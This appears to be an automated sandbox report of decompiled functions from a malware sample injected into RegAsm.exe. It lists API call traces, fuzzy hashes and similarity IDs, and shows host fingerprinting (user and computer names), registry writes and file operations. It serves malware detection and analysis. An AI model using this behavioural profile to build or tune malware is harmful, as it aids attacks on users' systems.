Instruction ID: 9a489d6a4e8d14927fc74ec5882edb70cabfcaeb5253dad548810fb42bc8fc7d
Opcode Fuzzy Hash: 35e639cc85263a1f5b51e9cea0d6abf5d6fe619002d0b41e6534cdc83ec5d216
Instruction Fuzzy Hash: 8F218372900519FFCB31EBE8DC48CBEBB7CEB64650B180965F901E3154E6715E40EB60

Uniqueness

Uniqueness Score: -1.00%

Function 03F1709C, Relevance: 13.7, APIs: 9, Instructions: 168memorythreadsleepCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 03F170DD
memset.NTDLL ref: 03F170F1

Part of subcall function 03F0B84E: RegQueryValueExA.KERNELBASE(00000000,03F1BD19,00000000,03F1BD19,00000000,?,00000000,00000000,00000000,00000001,74E04D40,03F1BD19,03F1BD19,?,03F1ED32,?), ref: 03F0B886
Part of subcall function 03F0B84E: RtlAllocateHeap.NTDLL(00000000,?), ref: 03F0B89A
Part of subcall function 03F0B84E: RegQueryValueExA.ADVAPI32(00000000,03F1BD19,00000000,03F1BD19,00000000,?,?,03F1ED32,?,03F1BD19,00000000,00000001,00000000,74E04D40), ref: 03F0B8B4
Part of subcall function 03F0B84E: RegCloseKey.ADVAPI32(00000000,?,03F1ED32,?,03F1BD19,00000000,00000001,00000000,74E04D40,?,?,?,03F1BD19,00000000), ref: 03F0B8DE

GetCurrentThreadId.KERNEL32 ref: 03F1717E
GetCurrentThread.KERNEL32 ref: 03F17191
RtlEnterCriticalSection.NTDLL(043AB148), ref: 03F17238
Sleep.KERNEL32(0000000A), ref: 03F17242
RtlLeaveCriticalSection.NTDLL(043AB148), ref: 03F17268
HeapFree.KERNEL32(00000000,?), ref: 03F17296
HeapFree.KERNEL32(00000000,00000018), ref: 03F172A9

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Heap$AllocateCriticalCurrentFreeQuerySectionThreadValue$CloseEnterLeaveSleepmemset
String ID:
API String ID: 1146182784-0
Opcode ID: 242422e8b4a53467413e32a9ad3b43d883785e0a63a065a6529377a04504188d
Instruction ID: f9433b9ad848cbbfa4cf17c609e196485b1d48e0937000ffc42148a5b33ae6b9
Opcode Fuzzy Hash: 242422e8b4a53467413e32a9ad3b43d883785e0a63a065a6529377a04504188d
Instruction Fuzzy Hash: A85157B1904346EFD720EF68E88081ABBE8FB58344F44492EF488D7260D770D9598F52

Uniqueness

Uniqueness Score: -1.00%

Function 03F0D07D, Relevance: 13.6, APIs: 9, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 03F11C6B: RtlEnterCriticalSection.NTDLL(03F2C328), ref: 03F11C73
Part of subcall function 03F11C6B: RtlLeaveCriticalSection.NTDLL(03F2C328), ref: 03F11C88
Part of subcall function 03F11C6B: InterlockedIncrement.KERNEL32(0000001C), ref: 03F11CA1

RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 03F0D0BA
memset.NTDLL ref: 03F0D0CB
lstrcmpi.KERNEL32(?,?), ref: 03F0D10B
RtlAllocateHeap.NTDLL(00000000,?), ref: 03F0D137
memcpy.NTDLL(00000000,?,?), ref: 03F0D14B
memset.NTDLL ref: 03F0D158
memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 03F0D171
memcpy.NTDLL(-00000005,?,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 03F0D194
HeapFree.KERNEL32(00000000,?), ref: 03F0D1B1

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Heapmemcpy$AllocateCriticalSectionmemset$EnterFreeIncrementInterlockedLeavelstrcmpi
String ID:
API String ID: 694413484-0
Opcode ID: c8b1ca8aafde36a32e2cb75b6edea419257b9fad5745c454da8041a3e33a2db5
Instruction ID: d719c5fda63fe7137cc14f5a1d92d6f0ec022036a32aaa1531ea72d521e4575e
Opcode Fuzzy Hash: c8b1ca8aafde36a32e2cb75b6edea419257b9fad5745c454da8041a3e33a2db5
Instruction Fuzzy Hash: 8041CE71E0020AEFDB20EFA8DC80B9EBBB9EB14314F144029F809E7294D775AA55DB50

Uniqueness

Uniqueness Score: -1.00%

Function 03F11B07, Relevance: 13.6, APIs: 9, Instructions: 110librarymemoryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,00000000,00000000,?,00000001,?,?,?,?,?,?,?,?,03F017CA,?), ref: 03F11B27
TlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,03F017CA,?), ref: 03F11B31
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,03F017CA,?), ref: 03F11B5A
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,03F017CA,?), ref: 03F11B68
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,03F017CA,?), ref: 03F11B76
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,03F017CA,?), ref: 03F11B84
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,03F017CA,?), ref: 03F11B92
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,03F017CA,?), ref: 03F11BA0
HeapFree.KERNEL32(00000000,00000000,00000000,?,0000000C,00000000,?,?,?,?,?,?,?,?,?,03F017CA), ref: 03F11C4B

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: LibraryLoad$AllocFreeHeap
String ID:
API String ID: 356845663-0
Opcode ID: dfed1870585f48278f4dcd7d59ba5507b204b4994d5e55fdf21190190d3018a2
Instruction ID: 7743677fb7a5dfa1b643a43593c16b4b47e3bb26eece5361cb084837a173db6e
Opcode Fuzzy Hash: dfed1870585f48278f4dcd7d59ba5507b204b4994d5e55fdf21190190d3018a2
Instruction Fuzzy Hash: DD415A71D0021DEFCB20EFA8E895D9EB7FCEB08304F140666E614DB254D774A946CB60

Uniqueness

Uniqueness Score: -1.00%

Function 03F1C42A, Relevance: 13.6, APIs: 9, Instructions: 110stringmemoryCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(03F1E978,00000008,00000008,?,?,?,?,03F1E978,00000008,?,?,00000008,?,03F14F0C,?,043A935D), ref: 03F1C441
lstrlen.KERNEL32(00000008,?,?,?,03F1E978,00000008,?,?,00000008,?,03F14F0C,?,043A935D), ref: 03F1C449
lstrlen.KERNEL32(?,?,?,?,03F1E978), ref: 03F1C4B4
RtlAllocateHeap.NTDLL(00000000,?), ref: 03F1C4DF
memcpy.NTDLL(00000000,00000002,-000000F6,?,?,?,03F1E978), ref: 03F1C4F0
memcpy.NTDLL(00000000,03F1E978,03F1E978,?,?,?,?,?,?,03F1E978), ref: 03F1C506
memcpy.NTDLL(00000000,?,?,00000000,03F1E978,03F1E978,?,?,?,?,?,?,03F1E978), ref: 03F1C518
memcpy.NTDLL(00000000,03F263D8,00000002,00000000,?,?,00000000,03F1E978,03F1E978,?,?,?,?,?,?,03F1E978), ref: 03F1C52B
memcpy.NTDLL(00000000,?,00000002,?,?,?,?,?,?,03F1E978), ref: 03F1C540

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: memcpy$lstrlen$AllocateHeap
String ID:
API String ID: 3386453358-0
Opcode ID: 46c65a055189d00e1115b445734fb83570ad24aac28c4568c14bc39d0dcdcf4a
Instruction ID: 0b08fdbf18525a61352e6076ffed9de746d5e1b865715366f17d5fff12975ab5
Opcode Fuzzy Hash: 46c65a055189d00e1115b445734fb83570ad24aac28c4568c14bc39d0dcdcf4a
Instruction Fuzzy Hash: FB414D76D0031AFBCF10DFA4DC84AAEBBB8EF58314F144055E915A7215E771EA60DB90

Uniqueness

Uniqueness Score: -1.00%

Function 03F22D79, Relevance: 13.6, APIs: 9, Instructions: 109memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 03F11C6B: RtlEnterCriticalSection.NTDLL(03F2C328), ref: 03F11C73
Part of subcall function 03F11C6B: RtlLeaveCriticalSection.NTDLL(03F2C328), ref: 03F11C88
Part of subcall function 03F11C6B: InterlockedIncrement.KERNEL32(0000001C), ref: 03F11CA1

RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 03F22DCA
lstrlen.KERNEL32(00000008,?,?,?,03F1597D,00000000,00000000), ref: 03F22DD9
RtlAllocateHeap.NTDLL(00000000,-00000021), ref: 03F22DEB
HeapFree.KERNEL32(00000000,00000000,?,?,?,03F1597D,00000000,00000000), ref: 03F22DFB
memcpy.NTDLL(00000000,00000000,00000000,?,?,?,03F1597D,00000000,00000000), ref: 03F22E0D
lstrcpy.KERNEL32(00000020), ref: 03F22E3F
RtlEnterCriticalSection.NTDLL(03F2C328), ref: 03F22E4B
RtlLeaveCriticalSection.NTDLL(03F2C328), ref: 03F22EA3

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: CriticalSection$Heap$AllocateEnterLeave$FreeIncrementInterlockedlstrcpylstrlenmemcpy
String ID:
API String ID: 3746371830-0
Opcode ID: 32b03268c32d46ecfe6a7e2b23fce6862965246792bd579972cf88696c4f6065
Instruction ID: f79bd3fee875e12cb18f575a479af36e2c8574db00a9214182eab16f00913d1c
Opcode Fuzzy Hash: 32b03268c32d46ecfe6a7e2b23fce6862965246792bd579972cf88696c4f6065
Instruction Fuzzy Hash: F04165B1900B2AEFCB21EF58C8A4B5EBFF8FB18311F144829E81597250D7749954EB80

Uniqueness

Uniqueness Score: -1.00%

Function 03F0E545, Relevance: 13.6, APIs: 9, Instructions: 105memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 03F08BA0: RtlAllocateHeap.NTDLL(00000000,?), ref: 03F08BD2
Part of subcall function 03F08BA0: HeapFree.KERNEL32(00000000,00000000,?,?,?,03F04A3F,?,00000022), ref: 03F08BF7

Part of subcall function 03F0D35A: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,03F0E582,?,?,?,?,?,00000022,00000000,00000000), ref: 03F0D396
Part of subcall function 03F0D35A: HeapFree.KERNEL32(00000000,00000000,00000000,00000001,?,03F0E582,?,?,?,?,?,00000022,00000000,00000000,00000000,?), ref: 03F0D3E9

lstrlen.KERNEL32(00000000,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 03F0E5B7
lstrlen.KERNEL32(?,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 03F0E5BF
lstrlen.KERNEL32(?), ref: 03F0E5C9
RtlAllocateHeap.NTDLL(00000000,?), ref: 03F0E5DE
wsprintfA.USER32 ref: 03F0E61A
HeapFree.KERNEL32(00000000,00000000,0000002D,00000000,00000000,00000000), ref: 03F0E639
HeapFree.KERNEL32(00000000,?), ref: 03F0E64E
HeapFree.KERNEL32(00000000,?), ref: 03F0E65B
HeapFree.KERNEL32(00000000,00000000,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 03F0E669

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Heap$Free$lstrlen$Allocate$wsprintf
String ID:
API String ID: 168057987-0
Opcode ID: 6f1c14f9123c4c7f51f66da0ad7685a102464fb5b57f0645574dab2a4b16a449
Instruction ID: 093391cfd46055cce1e26c7d399ba6dc6dd563b8dbe7012e2c5de174a4e5e0b8
Opcode Fuzzy Hash: 6f1c14f9123c4c7f51f66da0ad7685a102464fb5b57f0645574dab2a4b16a449
Instruction Fuzzy Hash: 6E31BC71A00319EBCB21EFA9DC40E5FBBA8EF54350F00092AF954E6290D770D814ABA6

Uniqueness

Uniqueness Score: -1.00%

Function 03F17420, Relevance: 13.6, APIs: 9, Instructions: 90filesynchronizationCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,C0000000,03F19EF0,00000000,03F19EF1,00000080,00000000,00000000,03F24E08,74E069A0,03F19EF0,?), ref: 03F17461
GetLastError.KERNEL32 ref: 03F1746B
WaitForSingleObject.KERNEL32(000000C8), ref: 03F17490
CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 03F174B1
SetFilePointer.KERNEL32(00000001,00000000,00000000,00000002), ref: 03F174D9
WriteFile.KERNEL32(00000001,00001388,?,00000002,00000000), ref: 03F174EE
SetEndOfFile.KERNEL32(00000001), ref: 03F174FB
GetLastError.KERNEL32 ref: 03F17507
CloseHandle.KERNEL32(00000001), ref: 03F17513

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: File$CreateErrorLast$CloseHandleObjectPointerSingleWaitWrite
String ID:
API String ID: 2864405449-0
Opcode ID: fa378df944118a3cde19e316a1f030dcbb798706626c7306b2a4327c995180e1
Instruction ID: 1817f0da8b70a3f2f4374fe0805bbd4b4bc8b8ddb37eef8002c37f4d5dc3944e
Opcode Fuzzy Hash: fa378df944118a3cde19e316a1f030dcbb798706626c7306b2a4327c995180e1
Instruction Fuzzy Hash: A3316C71900209EBDF21EFA8ED49FAEBFB9EB04315F148165F954E60D0C3748A64EB61

Uniqueness

Uniqueness Score: -1.00%

Function 03F1260A, Relevance: 13.6, APIs: 9, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,03F13EA9,00000008,?,00000010,00000001,00000000,0000003A), ref: 03F12629
WriteFile.KERNEL32(?,00000001,?,?,?), ref: 03F1265D
ReadFile.KERNEL32(?,00000001,?,?,?), ref: 03F12665
GetLastError.KERNEL32 ref: 03F1266F
WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 03F1268B
GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 03F126A4
CancelIo.KERNEL32(?), ref: 03F126B9
CloseHandle.KERNEL32(?), ref: 03F126C9
GetLastError.KERNEL32 ref: 03F126D1

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: ErrorFileLast$CancelCloseCreateEventHandleMultipleObjectsOverlappedReadResultWaitWrite
String ID:
API String ID: 4263211335-0
Opcode ID: 269a1ca54b9b567de872b52e0a2f44f55dd225ca95f1c1d96eacfe02fc4e8c4f
Instruction ID: b2c7ccaa40db4df954cb15aafebdbf60934ba00586e3b80f7be063f8c44574d1
Opcode Fuzzy Hash: 269a1ca54b9b567de872b52e0a2f44f55dd225ca95f1c1d96eacfe02fc4e8c4f
Instruction Fuzzy Hash: AB216B3291011DFFCB20EFA8E8488AE7B7DFB58351F048422F906D6195D7B09A60CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 03F12392, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000001,?,00000000,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,03F148E5,00000000,74E5F5B0,03F21D54,?,00000001), ref: 03F1239E
_aulldiv.NTDLL(00000192,?,54D38000,00000192), ref: 03F123B4
_snwprintf.NTDLL ref: 03F123D9
CreateFileMappingW.KERNEL32(000000FF,03F2C1A8,00000004,00000000,00001000,?), ref: 03F123F5
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 03F12407
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 03F1241E
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?), ref: 03F1243F
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 03F12447

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: c1abf6cddfceb299a4d9baec683f4b08327ec8f5bb5a182b01717f6825bd4b92
Instruction ID: bb477887eb4a31a13a05555ba906227b8e34ddc2c3c508153d7ec4d82b4038e7
Opcode Fuzzy Hash: c1abf6cddfceb299a4d9baec683f4b08327ec8f5bb5a182b01717f6825bd4b92
Instruction Fuzzy Hash: 90212472600218FBD720EBA4EC0AF8D77B9AF54700F244021F611EB1D5E7B095019B60

Uniqueness

Uniqueness Score: -1.00%

Function 03F1E721, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 190stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,?,043A99A0,?,?,043A99A0,?,?,043A99A0,?,?,043A99A0,?,00000000,00000000,00000000), ref: 03F1E81F
lstrcpyW.KERNEL32(00000000,?), ref: 03F1E842
lstrcatW.KERNEL32(00000000,00000000), ref: 03F1E84A
lstrlenW.KERNEL32(00000000,?,043A99A0,?,?,043A99A0,?,?,043A99A0,?,?,043A99A0,?,?,043A99A0,?), ref: 03F1E895
memcpy.NTDLL(00000000,?,?,?), ref: 03F1E8FD
LocalFree.KERNEL32(?,?), ref: 03F1E914

Strings

P, xrefs: 03F1E79A

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: lstrlen$FreeLocallstrcatlstrcpymemcpy
String ID: P
API String ID: 3649579052-3110715001
Opcode ID: 5bf1906e2338501b2c545fc2c50e7df93ee26d88e22d0e7214aaf6544532024d
Instruction ID: 99ea2f39626137016768880a2e65c0c4d3d4459ce85d57bb9b551f3bdc378b0a
Opcode Fuzzy Hash: 5bf1906e2338501b2c545fc2c50e7df93ee26d88e22d0e7214aaf6544532024d
Instruction Fuzzy Hash: E2616D7590020EEFDF20EFA5EC98DAEBBB9EF64304F184025E905E7250DB359956CB60

Uniqueness

Uniqueness Score: -1.00%

Function 03F08924, Relevance: 12.1, APIs: 8, Instructions: 123memoryregistrysynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 03F08E53: RegCreateKeyA.ADVAPI32(80000001,043AA7F0,?), ref: 03F08E68
Part of subcall function 03F08E53: lstrlen.KERNEL32(043AA7F0,00000000,00000000,00000000,?,03F0B86A,00000000,00000000,00000001,74E04D40,03F1BD19,03F1BD19,?,03F1ED32,?,03F1BD19), ref: 03F08E91

RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 03F08969
RtlAllocateHeap.NTDLL(00000000,00000105), ref: 03F08981
HeapFree.KERNEL32(00000000,?,?,00000000,03F14995,00000000,74E5F5B0,03F21D54,?,00000001), ref: 03F089E3
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 03F089F7
WaitForSingleObject.KERNEL32(00000000,?,00000000,03F14995,00000000,74E5F5B0,03F21D54,?,00000001), ref: 03F08A49
HeapFree.KERNEL32(00000000,?,?,00000000,03F14995,00000000,74E5F5B0,03F21D54,?,00000001), ref: 03F08A72
HeapFree.KERNEL32(00000000,03F14995,?,00000000,03F14995,00000000,74E5F5B0,03F21D54,?,00000001), ref: 03F08A82
RegCloseKey.ADVAPI32(00000000,?,00000000,03F14995,00000000,74E5F5B0,03F21D54,?,00000001), ref: 03F08A8B

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Heap$AllocateFree$CloseCreateObjectSingleWaitlstrlen
String ID:
API String ID: 3503961013-0
Opcode ID: f4ba96809f68e470b5afe5920d2379b75566085b639c259956f4fc961bf8f449
Instruction ID: 4b190cf4c37fe59c6854225d27f0e15e5b0e44390ce14823eb6f6d3c88d9e28c
Opcode Fuzzy Hash: f4ba96809f68e470b5afe5920d2379b75566085b639c259956f4fc961bf8f449
Instruction Fuzzy Hash: 5D41B275C0020EFFCF21EFD9DC948AEBBB9FB08285F14446AE510A2294D3355A95EF60

Uniqueness

Uniqueness Score: -1.00%

Function 03F1EB2F, Relevance: 12.1, APIs: 8, Instructions: 112memorystringCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(00000000,0000002C,7673D3B0,00000000,00000000,03F1BD43), ref: 03F1EB60
StrChrA.SHLWAPI(00000001,0000002C), ref: 03F1EB73
StrTrimA.SHLWAPI(00000000,?), ref: 03F1EB96
StrTrimA.SHLWAPI(00000001,?), ref: 03F1EBA5
lstrlen.KERNEL32(00000000), ref: 03F1EBDA
RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 03F1EBED
lstrcpy.KERNEL32(00000004,00000000), ref: 03F1EC0B
HeapFree.KERNEL32(00000000,00000000,00000001,00000000,-00000005,00000001), ref: 03F1EC2F

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: HeapTrim$AllocateFreelstrcpylstrlen
String ID:
API String ID: 1974185407-0
Opcode ID: c9d2538c23d0a4817d1a920dc20b0c2faa8a05d43870336a948b8855fcfb6fac
Instruction ID: f93d63fc936afafa00409b2e30f1408dd5ca44390dfa0314a3082045b82ec64b
Opcode Fuzzy Hash: c9d2538c23d0a4817d1a920dc20b0c2faa8a05d43870336a948b8855fcfb6fac
Instruction Fuzzy Hash: DF319C35900209EFCB21EFA5EC94E9EBBB8EF29B40F144056F9059B254D7709951DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03F12972, Relevance: 12.1, APIs: 8, Instructions: 112stringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,?,?,?,?,?,?,03F01E60), ref: 03F12988
wsprintfA.USER32 ref: 03F129B0
lstrlen.KERNEL32(?), ref: 03F129BF

Part of subcall function 03F04CF5: RtlFreeHeap.NTDLL(00000000,00000000,03F0194B,00000000), ref: 03F04D01

wsprintfA.USER32 ref: 03F129FF
wsprintfA.USER32 ref: 03F12A34
memcpy.NTDLL(00000000,?,?), ref: 03F12A41
memcpy.NTDLL(00000008,03F263D8,00000002,00000000,?,?), ref: 03F12A56
wsprintfA.USER32 ref: 03F12A79

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: wsprintf$Timememcpy$FileFreeHeapSystemlstrlen
String ID:
API String ID: 2937943280-0
Opcode ID: 4e033530df2b7d3937e9a6b8e11c39534348125a57a5ca8f90a8831071bb7eac
Instruction ID: a053bbf2d58a38a1f46afcf4a5941f9f190ac0bc478551c3197f2a7e45c93171
Opcode Fuzzy Hash: 4e033530df2b7d3937e9a6b8e11c39534348125a57a5ca8f90a8831071bb7eac
Instruction Fuzzy Hash: 17411D75A00209EFDB10EF98DC94EAEB7FCEF48308B144565F919D7211EB30EA158B60

Uniqueness

Uniqueness Score: -1.00%

Function 03F15730, Relevance: 12.1, APIs: 8, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(00000000,03F05BC2), ref: 03F15767
RtlAllocateHeap.NTDLL(00000000,03F05BC2), ref: 03F1577E
GetUserNameW.ADVAPI32(00000000,03F05BC2), ref: 03F1578B
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,03F05BC2,?,?,?,00000000,03F21CFE), ref: 03F157B1
GetComputerNameW.KERNEL32(00000000,00000000), ref: 03F157D8
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 03F157EC
GetComputerNameW.KERNEL32(00000000,00000000), ref: 03F157F9
HeapFree.KERNEL32(00000000,00000000), ref: 03F1581C

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID:
API String ID: 3239747167-0
Opcode ID: 3b565c57fb3969346da9990fe170fb15f815a847743ef5d10727827e4ffa5883
Instruction ID: aa472a6e2643dec7ee272d1e9f3422b1c0c5a7cf004a227e07af985579e3d837
Opcode Fuzzy Hash: 3b565c57fb3969346da9990fe170fb15f815a847743ef5d10727827e4ffa5883
Instruction Fuzzy Hash: 49314FB6A0020EEFDB20EFA9DC91A6EF7F9FB94210F554469E805D3254D770ED109B10

Uniqueness

Uniqueness Score: -1.00%

Function 03F08CA9, Relevance: 12.1, APIs: 8, Instructions: 72memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 03F08CCD
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 03F08CDF
wcstombs.NTDLL ref: 03F08CED
lstrlen.KERNEL32(00000000,?,?,?,?,?), ref: 03F08D11
RtlAllocateHeap.NTDLL(00000000,00000002), ref: 03F08D26
mbstowcs.NTDLL ref: 03F08D33
HeapFree.KERNEL32(00000000,00000000), ref: 03F08D45
HeapFree.KERNEL32(00000000,00000000,?,?), ref: 03F08D5F

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Heap$AllocateFreelstrlen$mbstowcswcstombs
String ID:
API String ID: 316328430-0
Opcode ID: bab31a29ca8355cefaf4aff0666132662f69c640781389ef443d3198154bc0a2
Instruction ID: 65345993fceaf339b242d1b8d235ac6080a69f8c9906ff2e19933621c682a6ff
Opcode Fuzzy Hash: bab31a29ca8355cefaf4aff0666132662f69c640781389ef443d3198154bc0a2
Instruction Fuzzy Hash: 9C217C7190020EFFDF20AFA5DC08E9E7FB9EB54391F144025F910E20A0D7719960EB60

Uniqueness

Uniqueness Score: -1.00%

Function 03F1E43A, Relevance: 12.1, APIs: 8, Instructions: 57registrymemorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(03F17ECD,00000000,00000000,03F2C340,?,?,03F15C0E,03F17ECD,00000000,03F17ECD,03F2C320), ref: 03F1E44D
RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 03F1E45B
wsprintfA.USER32 ref: 03F1E477
RegCreateKeyA.ADVAPI32(80000001,03F2C320,00000000), ref: 03F1E48F
lstrlen.KERNEL32(?), ref: 03F1E49E
RegSetValueExA.ADVAPI32(00000001,00000000,00000000,00000001,?,00000001), ref: 03F1E4AC
RegCloseKey.ADVAPI32(?), ref: 03F1E4B7
HeapFree.KERNEL32(00000000,00000000), ref: 03F1E4C6

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Heaplstrlen$AllocateCloseCreateFreeValuewsprintf
String ID:
API String ID: 1575615994-0
Opcode ID: 36c44811ec13eaa17abf367739792af697c78a0a14bc63ee3bc73af72cef20b9
Instruction ID: 95848fd679ce3a85723b63ae1c86a4a492b6fc5aacddc52cee6e74fd7b4404ba
Opcode Fuzzy Hash: 36c44811ec13eaa17abf367739792af697c78a0a14bc63ee3bc73af72cef20b9
Instruction Fuzzy Hash: 61116D3610010DFFDB21AB94EC69EAA3B7DFB54715F100025FE04D61A4DBB29D55EB60

Uniqueness

Uniqueness Score: -1.00%

Function 03F04B3C, Relevance: 12.1, APIs: 8, Instructions: 52registryCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000040,00000000,?), ref: 03F04B48
RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 03F04B66
RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 03F04B6E
DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 03F04B8C
GetLastError.KERNEL32 ref: 03F04BA0
RegCloseKey.ADVAPI32(?), ref: 03F04BAB
CloseHandle.KERNEL32(00000000), ref: 03F04BB2
GetLastError.KERNEL32 ref: 03F04BBA

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: CloseErrorHandleLastOpen$CreateDuplicateProcess
String ID:
